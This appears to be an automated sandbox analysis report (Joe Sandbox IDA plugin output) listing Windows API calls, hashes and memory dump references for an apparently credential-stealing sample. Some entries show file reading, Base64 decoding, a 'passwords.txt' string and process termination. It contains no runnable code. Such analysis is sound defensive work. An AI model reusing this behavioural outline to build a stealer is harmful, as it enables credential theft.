                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                                                    • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                                                    • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0008DB7F: lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0008DBBB
                                                                                                                                                                                                                                                      • Part of subcall function 0008DB7F: strchr.MSVCRT ref: 0008DBCD
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,750A5460,?,00000000), ref: 0008DD04
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008DD0B
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DD20
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DD27
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0008DD43
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DD55
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DD62
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0008DD93
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DD9A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 0008DDA1
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008DDA8
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DDBD
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DDC4
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0008DDDA
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DDEC
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DDF3
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0008DE11
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DE18
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 0008DE1F
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008DE26
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DE3B
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DE42
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0008DE52
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DE64
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DE6B
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0008DE93
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DE9A
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 0008DEA1
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008DEA8
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DEC3
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DECA
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0008DEDD
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DEEF
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DEF6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0008DEFF
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0008DF15
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008DF1C
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0008DF34
                                                                                                                                                                                                                                                      • Part of subcall function 0008F128: std::_Xinvalid_argument.LIBCPMT ref: 0008F13E
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0008DF75
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0008DF9B
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DFA8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0008DFAD
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0008DFBC
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008DFC3
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DFD7
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008DFDE
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0008DFEC
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008DFF9
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008E000
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008E035
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008E03C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 0008E043
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0008E04A
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0008E065
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008E077
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008E07E
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008E122
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008E129
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0008E173
                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0008E17A
                                                                                                                                                                                                                                                      • Part of subcall function 0008DB7F: strchr.MSVCRT ref: 0008DBF2
                                                                                                                                                                                                                                                      • Part of subcall function 0008DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0008DCF7), ref: 0008DC14
                                                                                                                                                                                                                                                      • Part of subcall function 0008DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008DC21
                                                                                                                                                                                                                                                      • Part of subcall function 0008DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0008DCF7), ref: 0008DC28
                                                                                                                                                                                                                                                      • Part of subcall function 0008DB7F: strcpy_s.MSVCRT ref: 0008DC6F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 838878465-0
                                                                                                                                                                                                                                                    • Opcode ID: 8bf91c94cad06c74d674722624a43567f538ce166864a8ebf2d2b51266bde13a
                                                                                                                                                                                                                                                    • Instruction ID: 07d55e170c93efd0b04de74733fe668fde591fcc43f76ee151d0d05817882813
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bf91c94cad06c74d674722624a43567f538ce166864a8ebf2d2b51266bde13a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29E11872C00218AFEF20BFF4EC89ADEBF79BB08304F25456AF255A7152DA3559849F10
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,000B73A4,000B680F), ref: 0008A9C1
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008A9D9
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008A9E1
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008A9ED
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008A9F7
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA09
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA15
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA1C
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(0008B824,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA2D
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA47
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA5A
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA64
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73A8,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA70
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA7A
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73AC,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA86
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA93
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AA9B
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73B0,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAA7
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAB7
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAC7
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AADA
                                                                                                                                                                                                                                                      • Part of subcall function 0008A7D8: _memset.LIBCMT ref: 0008A815
                                                                                                                                                                                                                                                      • Part of subcall function 0008A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A830
                                                                                                                                                                                                                                                      • Part of subcall function 0008A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0008A838
                                                                                                                                                                                                                                                      • Part of subcall function 0008A7D8: _memmove.LIBCMT ref: 0008A8BB
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAE9
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73B4,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AAF5
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB05
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB15
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB28
                                                                                                                                                                                                                                                      • Part of subcall function 0008A7D8: lstrcatA.KERNEL32(000B6803,000B6807,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A8E5
                                                                                                                                                                                                                                                      • Part of subcall function 0008A7D8: lstrcatA.KERNEL32(000B6803,000B680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0008AAE7), ref: 0008A8FB
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB37
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73B8,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB43
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,000B73BC,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB4F
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0008B824), ref: 0008AB5F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0008AB7D
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0008ABAC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocBinaryCloseCreateCryptHandleProcessReadSizeString_memmove_memset
                                                                                                                                                                                                                                                    • String ID: passwords.txt$p-
                                                                                                                                                                                                                                                    • API String ID: 1221571796-284941404
                                                                                                                                                                                                                                                    • Opcode ID: 3e85416fb593110165dcf1d103933ec8e084c06fd7aac42051b61059d3c9720c
                                                                                                                                                                                                                                                    • Instruction ID: 6d5730ea59423fac9d8609dfa2c9d4d20a0670ad13c3f399b57b92a3b7ce034c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e85416fb593110165dcf1d103933ec8e084c06fd7aac42051b61059d3c9720c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86714A32902115ABCF017BA4FC8DDDE7BB9FF49705B024012FA51AB162DB749D059BA2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090795: StrCmpCA.SHLWAPI(?,?,?,00088863,?,?,?), ref: 0009079E
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00088941
                                                                                                                                                                                                                                                      • Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538
                                                                                                                                                                                                                                                      • Part of subcall function 000922B0: _memset.LIBCMT ref: 000922D7
                                                                                                                                                                                                                                                      • Part of subcall function 000922B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0009237D
                                                                                                                                                                                                                                                      • Part of subcall function 000922B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0009238B
                                                                                                                                                                                                                                                      • Part of subcall function 000922B0: CloseHandle.KERNEL32(00000000), ref: 00092392
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
